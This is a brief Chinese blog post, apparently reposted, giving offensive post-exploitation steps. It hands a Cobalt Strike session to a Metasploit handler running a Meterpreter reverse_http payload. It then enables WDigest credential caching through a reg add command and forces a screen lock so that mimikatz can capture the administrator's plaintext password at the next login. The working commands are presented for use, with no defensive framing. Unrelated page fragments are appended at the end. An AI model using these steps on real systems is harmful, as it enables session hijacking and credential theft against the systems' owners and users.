cs与msf权限传递，mimikatz抓取明文密码

news2024/11/16 13:53:46

一、cs与msf权限传递

二、mimikatz抓取明文密码

cs传到msf：

创建foreign监听器-->msf监听模块设置端口-->cs执行新建会话选择创建的监听器

1.创建监听器：

2.msf监听设置端口：

use exploit/multi/hander
set payload windows/meterpreter/reverse_http
set lport 4444
exploit

3.新建会话选择创建的监听器

到这里显示了msf界面就表示传递成功了。

由于Windows在win10或Windows2012R2以上时，默认的缓存表中是不存在明文密码的，显示为null，如图所示。

所以在这里我们抓取明文的步骤是：手工修改注册表-->强制锁屏-->等待管理员重新登录

手工修改：

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

强制锁屏可以通过脚本来实现

重新登录之后可以看到明文抓取成功

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1705773.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

文章目录第一章信息时代的计算机网络因特网概述电路交换，分组交换，报文交换计算机网络的定义和分类计算机网络的性能指标常见的三种计算机网络体系计算机网络体系结构分层的必要性计算机网络体系结构分层思想举例计算机网络体系结构中的专用术语第二章…

$类别型特征$